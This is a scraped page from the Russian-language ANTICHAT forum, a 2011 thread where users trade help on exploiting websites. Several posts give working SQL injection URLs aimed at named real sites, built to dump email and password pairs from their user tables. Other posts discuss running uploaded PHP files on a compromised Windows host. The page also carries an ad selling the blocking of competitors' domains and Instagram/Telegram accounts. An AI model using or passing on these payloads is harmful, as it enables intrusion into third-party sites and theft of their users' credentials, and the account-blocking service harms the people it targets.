УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1712 из 2438

1712

Опции темы

Поиск в этой теме

Опции просмотра

#17111

29.05.2011, 17:20

Lestatkiy

Guest

Сообщений: n/a

Провел на форуме:
15203

Репутация: 5

Код:

Code:
http :// www.meraevents.com/Service_provider_detail.php?spid=1409-999.9+union+select+1,concat(0x696e6a64617461626567696e,concat(@i:=0x00,@o:=0x0d0a,benchmark(10,@o%20:=CONCAT(@o,0x0d0a,(SELECT%20concat(@i:=Email,0x3a,Password)%20from%20user%20WHERE%20Email%3E@i%20order%20by%20Email%20LIMIT%201))),@o),0x696e6a64617461656e64),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

такой прошел, только больше не вывести.

Код:

Code:
http :// www.meraevents.com/Service_provider_detail.php?spid=1409-999.9+union+select+1,concat_ws(0x3a,Email,Password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+user--

Так совсем ничего не видно

сдампить дампером также нельзя.

#17112

29.05.2011, 17:58

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Код:

Code:
http://www.meraevents.com/Service_provider_detail.php?spid=(1409)and(1=0)union(select(1),2,(select(@x)from(select(@x:=0x00),(select(0)from(user)where(0x00)in(@x:=concat(@x,0x3c62723e,Email,0x3a,Password))))x),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)--+

#17113

30.05.2011, 06:03

GroM88

Познающий

Регистрация: 25.10.2007

Сообщений: 46

Провел на форуме:
318186

Репутация: 2

Отправить сообщение для GroM88 с помощью ICQ

http://www.horolive.com/member-profile.php

как такое раскрутить?)

#17114

30.05.2011, 06:44

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от GroM88

GroM88 said:
http://www.horolive.com/member-profile.php
как такое раскрутить?)

Только на карусели такое раскручивается =\

А где ты тут уязвимость увидели? Ты дал просто путь к скрипту и что дальше?

#17115

30.05.2011, 06:46

GroM88

Познающий

Регистрация: 25.10.2007

Сообщений: 46

Провел на форуме:
318186

Репутация: 2

Цитата:

Сообщение от None

А где ты тут уязвимость увидели? Ты дал просто путь к скрипту и что дальше?

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND b.name not like '%test%' ORDER BY a.subscription_date ASC' at line 1

#17116

30.05.2011, 07:26

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Цитата:

Сообщение от GroM88

GroM88 said:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND b.name not like '%test%' ORDER BY a.subscription_date ASC' at line 1

Эм...

Ошибка в самом запросе локально, в ней никаких передаваемых параметров удаленно. Как ты представляешь, такое можно проэкспуатировать?

Ну просто логически подумав можно же понять, что никак.

Поимев сорцы можно посмотреть что и как там происходит и возможно получить полноценный SQLi, но так это скорее всего просто локальная ошибка независимая от внешних параметров.

Вот если бы ошибка SQL вылезала при манипуляции с хидерами (Referer, User-Agent) или же GET \ POST \ COOKIE параметрами то да, это была бы скорее всего SQLi, а так... =\

#17117

30.05.2011, 07:40

ubi

Новичок

Регистрация: 25.12.2009

Сообщений: 18

Провел на форуме:
278340

Репутация: 0

Цитата:

Сообщение от GroM88

GroM88 said:
http://www.horolive.com/member-profile.php
как такое раскрутить?)

Код:

Code:
http://www.horolive.com/psychic-profile.php?id=-3254+union+select+1,concat_ws(0x3a,name,password),3,4,5,6,7,8+from+user--+

#17118

30.05.2011, 16:03

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

есть хост справами роот, через пхп админ могу заливать файлы, но почемуто при заходе на сам файл, он не отоброжается в браузере, а через load_file('') говорит что он есть

сервак стоит на винде...

#17119

30.05.2011, 16:22

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

база и сам сайт на разных хостах, посмотри @@version_compile_os

#17120

30.05.2011, 16:36

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от Konqi

Konqi said:
база и сам сайт на разных хостах, посмотри @@version_compile_os

@@version_compile_os=Win32

@@version=5.0.18-nt

есть точный путь до корневого католога сайта, .htaccess не мешает, пхп выполняется, а мой не хочет, даже элементарный phpinfo();

Страница 1712 из 2438

1712

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход